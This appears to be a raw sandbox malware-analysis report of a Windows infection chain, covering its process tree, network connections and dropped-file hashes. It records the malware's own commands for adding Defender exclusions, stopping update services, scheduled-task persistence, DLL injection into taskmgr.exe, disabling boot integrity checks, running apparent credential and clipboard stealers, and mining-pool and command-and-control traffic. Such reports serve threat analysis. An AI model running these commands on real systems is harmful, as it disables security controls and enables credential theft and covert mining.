"C:\Windows\System32\cmd.exe" /c taskkill /im "Ti7BaeU3IDoi3JgxcuwS4XBO.exe" /f & erase "C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Ti7BaeU3IDoi3JgxcuwS4XBO.exe" /f

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231005034152.log C:\Windows\Logs\CBS\CbsPersist_20231005034152.cab

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\Pictures\h15Hs6ewA8wDxuAPG7SwUvHx.exe

"C:\Users\Admin\Pictures\h15Hs6ewA8wDxuAPG7SwUvHx.exe"

C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe

"C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {F1260FFC-C553-4B39-9F8B-E1C549273F12} S-1-5-21-3185155662-718608226-894467740-1000:YETUIZPU\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\74-e4a16-c1c-d499b-a0b8c979f3235\Cutunufihi.exe

"C:\Users\Admin\AppData\Local\Temp\74-e4a16-c1c-d499b-a0b8c979f3235\Cutunufihi.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 388

C:\Program Files\Google\DTIYPLMWZT\lightcleaner.exe

"C:\Program Files\Google\DTIYPLMWZT\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-11HUT.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-11HUT.tmp\lightcleaner.tmp" /SL5="$501B6,833775,56832,C:\Program Files\Google\DTIYPLMWZT\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1ciGA4

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\8259092891.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/1ciGA4

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1464 CREDAT:275457 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\vabgtjshkifw.xml"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
DE 148.251.234.93:443 yip.su tcp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 jetpackdelivery.net udp
US 8.8.8.8:53 bolidare.beget.tech udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 net.geo.opera.com udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 goboh2b.top udp
US 172.67.216.81:443 flyawayaero.net tcp
RU 45.8.228.16:80 goboh2b.top tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
US 172.67.187.122:443 lycheepanel.info tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 link.storjshare.io udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 188.114.97.1:443 jetpackdelivery.net tcp
US 136.0.77.2:443 link.storjshare.io tcp
NL 13.227.219.74:443 downloads.digitalpulsedata.com tcp
US 85.217.144.143:80 85.217.144.143 tcp
US 85.217.144.143:80 85.217.144.143 tcp
RU 91.106.207.50:80 bolidare.beget.tech tcp
US 8.8.8.8:53 potatogoose.com udp
US 104.21.35.235:443 potatogoose.com tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.153:80 apps.identrust.com tcp
NL 88.221.25.153:80 apps.identrust.com tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 justsafepay.com udp
US 188.114.97.0:443 justsafepay.com tcp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 136.0.77.2:80 link.storjshare.io tcp
BG 193.42.32.29:80 193.42.32.29 tcp
BG 193.42.32.29:80 193.42.32.29 tcp
US 8.8.8.8:53 demo.seafile.com udp
DE 168.119.152.22:80 demo.seafile.com tcp
DE 168.119.152.22:443 demo.seafile.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
DE 116.203.7.13:80 116.203.7.13 tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 m7val1dat0r.info udp
US 188.114.96.0:443 m7val1dat0r.info tcp
US 8.8.8.8:53 script.google.com udp
DE 172.217.23.206:80 script.google.com tcp
DE 172.217.23.206:443 script.google.com tcp
US 8.8.8.8:53 script.googleusercontent.com udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
US 8.8.8.8:53 connectini.net udp
GB 91.109.116.11:443 connectini.net tcp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
DE 52.219.169.34:443 wewewe.s3.eu-central-1.amazonaws.com tcp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
US 8.8.8.8:53 link.storjshare.io udp
US 136.0.77.2:443 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 f9b25f7e-30f3-4969-85a9-94328ab0e2f5.uuid.ramboclub.net udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
BG 193.42.32.29:80 193.42.32.29 tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 8.8.8.8:53 stun4.l.google.com udp
US 8.8.8.8:53 server13.ramboclub.net udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 74.125.204.127:19302 stun4.l.google.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
BG 185.82.216.48:443 server13.ramboclub.net tcp
US 8.8.8.8:53 mastertryprice.com udp
US 172.67.212.103:443 mastertryprice.com tcp

Files

memory/2408-0-0x00000000748E0000-0x0000000074FCE000-memory.dmp

memory/2408-1-0x0000000000F30000-0x0000000000F68000-memory.dmp

memory/2408-2-0x0000000000400000-0x0000000000440000-memory.dmp

memory/2408-3-0x0000000000480000-0x00000000004AA000-memory.dmp

memory/2408-4-0x00000000003E0000-0x00000000003FA000-memory.dmp

memory/1812-5-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1812-7-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1812-9-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2408-11-0x00000000748E0000-0x0000000074FCE000-memory.dmp

memory/1812-10-0x00000000748E0000-0x0000000074FCE000-memory.dmp

memory/1812-12-0x00000000003C0000-0x0000000000400000-memory.dmp

memory/1580-15-0x0000000071460000-0x0000000071A0B000-memory.dmp

memory/1580-16-0x0000000071460000-0x0000000071A0B000-memory.dmp

memory/1580-17-0x00000000026F0000-0x0000000002730000-memory.dmp

memory/1580-18-0x00000000026F0000-0x0000000002730000-memory.dmp

memory/1580-19-0x00000000026F0000-0x0000000002730000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabD8C4.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\TarDA0F.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

memory/1812-85-0x00000000748E0000-0x0000000074FCE000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8c43ff2ba958a6d181bad3b1cc4a60c3
SHA1 59d099a2b1fb932e866e1ecf72c33ef4c3ded92e
SHA256 64b25b72623b825573cecb3c2fde31a9540ac92d7bcf9fe4a2e6cac50cd82460
SHA512 9ddaa18f9d6dedd71f3b8794325dbd9d7d8cb11b0bcea8b14c87f58871e5e7e7111f7c58902bd89bc795ad6dfc2643065abe90068744c8ac03d53d796ca9d45f

\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

memory/1812-118-0x00000000003C0000-0x0000000000400000-memory.dmp

C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

memory/1580-120-0x0000000071460000-0x0000000071A0B000-memory.dmp

\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe

MD5 7dff870a8e54135377aa5c2503bb6dea
SHA1 3d90ea01a06882d1583833df526bbd817834b88d
SHA256 20c4fd3dec92bc5086be616a5a59b4d5233d4ff6cc1e4e65f69e2e1df64c8ccd
SHA512 433c198216a72e7b5e3bc12e7e0a3874b7f3a0df2a49e903cf519c180a607ff94f2329b790b91ffc5d3418ba27d8836e47eb4d1e2668f12f9646494b17034836

C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

memory/1812-125-0x0000000009050000-0x000000000959D000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bb3db9189fb7141ba79a219318221dea
SHA1 7a2867a41eabe59a48a38f7a1987a7d218366095
SHA256 979a1b18c754bd9e15a7c080b6f708d6fa346f389b45a938eedd3120f41895d9
SHA512 a85589f35d7724a3acff372e9d24bba3143ea34110930de8ff97b6f7bdc3730fff3d9108686f74f107ee6e16823e395c142991cb14ea4eeb60d82ee1d70b5454

\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe

MD5 7dff870a8e54135377aa5c2503bb6dea
SHA1 3d90ea01a06882d1583833df526bbd817834b88d
SHA256 20c4fd3dec92bc5086be616a5a59b4d5233d4ff6cc1e4e65f69e2e1df64c8ccd
SHA512 433c198216a72e7b5e3bc12e7e0a3874b7f3a0df2a49e903cf519c180a607ff94f2329b790b91ffc5d3418ba27d8836e47eb4d1e2668f12f9646494b17034836

C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe

MD5 7dff870a8e54135377aa5c2503bb6dea
SHA1 3d90ea01a06882d1583833df526bbd817834b88d
SHA256 20c4fd3dec92bc5086be616a5a59b4d5233d4ff6cc1e4e65f69e2e1df64c8ccd
SHA512 433c198216a72e7b5e3bc12e7e0a3874b7f3a0df2a49e903cf519c180a607ff94f2329b790b91ffc5d3418ba27d8836e47eb4d1e2668f12f9646494b17034836

C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

memory/1580-154-0x0000000071460000-0x0000000071A0B000-memory.dmp

\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

memory/1580-158-0x00000000026F0000-0x0000000002730000-memory.dmp

memory/1980-162-0x0000000001340000-0x000000000188D000-memory.dmp

C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050341165261980.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/1496-202-0x0000000002820000-0x0000000002C18000-memory.dmp

\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

memory/1580-209-0x00000000026F0000-0x0000000002730000-memory.dmp

C:\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
